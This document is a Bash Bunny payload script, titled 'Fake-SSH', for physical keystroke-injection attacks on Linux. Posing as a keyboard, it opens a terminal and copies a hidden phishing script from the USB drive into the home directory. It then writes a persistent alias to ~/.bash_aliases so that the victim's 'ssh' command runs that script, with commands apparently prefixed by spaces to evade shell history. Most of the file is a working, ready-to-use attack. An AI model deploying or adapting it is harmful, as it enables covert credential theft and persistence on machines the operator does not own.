bashbunny-payloads/payloads/library/phishing/fake-ssh/payload.txt

#!/bin/bash
#
# Title:            Fake-SSH
#
# Description:      
#                   This program creates a fake "ssh" 
#                   command by defining an persistent alias.
#
# Author:           TW-D
# Version:          1.0
# Category:         Phishing
# Target:           Linux
# Attackmodes:      HID and STORAGE
#
# TESTED ON
# ===============
# Ubuntu 20.04.4 LTS x86_64 (Xfce) and OpenSSH_8.2p1
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Yellow quadruple blink .......................... STAGE4
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH

######## INITIALIZATION ########

readonly BB_LABEL="BashBunny"

######## SETUP ########

LED SETUP

ATTACKMODE HID STORAGE
GET SWITCH_POSITION
udisk mount

######## ATTACK ########

LED ATTACK

Q DELAY 7000
Q CTRL-ALT t
Q DELAY 7000

LED STAGE2

Q STRING " cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/"
Q ENTER
Q DELAY 1500

Q STRING " cp ./ssh-phishing.sh ~/.ssh_phishing.sh"
Q ENTER
Q DELAY 1500

LED STAGE3

Q STRING " chmod +x ~/.ssh_phishing.sh"
Q ENTER
Q DELAY 1500

Q STRING " printf \"\\nalias ssh='~/.ssh_phishing.sh'\\n\" >> ~/.bash_aliases"
Q ENTER
Q DELAY 1500

LED STAGE4

Q STRING " exit"
Q ENTER
Q DELAY 1500

######## CLEANUP ########

LED CLEANUP

sync
udisk unmount

######## FINISH ########

LED FINISH

shutdown -h 0